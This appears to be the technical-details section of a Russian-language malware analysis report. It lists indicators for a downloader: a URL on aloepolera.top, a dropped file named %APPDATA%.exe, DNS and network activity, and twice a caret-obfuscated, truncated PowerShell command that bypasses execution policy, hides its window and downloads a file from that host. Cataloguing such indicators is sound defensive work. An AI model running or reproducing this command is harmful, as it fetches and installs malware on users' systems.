Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WeRSH^El^l.E^xe ^-ExecuTiON^pO^lIc^Y b^yp^a^s^S^ ^-NopROfI^LE -WiN^doW^sTYL^e ^hI^ddEn (^NE^W-objEC^T ^sy^St^eM.^NE^t.^wEbclI^en^T).^d^OWnL^oADfI^le^('http://aloepolera.top/r...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "Po^WeRSH^El^l.E^xe ^-ExecuTiON^pO^lIc^Y b^yp^a^s^S^ ^-NopROfI^LE -WiN^doW^sTYL^e ^hI^ddEn (^NE^W-objEC^T ^sy^St^eM.^NE^t.^wEbclI^en^T).^d^OWnL^oADfI^le^('http://aloepolera.top/r...' (со скрытым окном)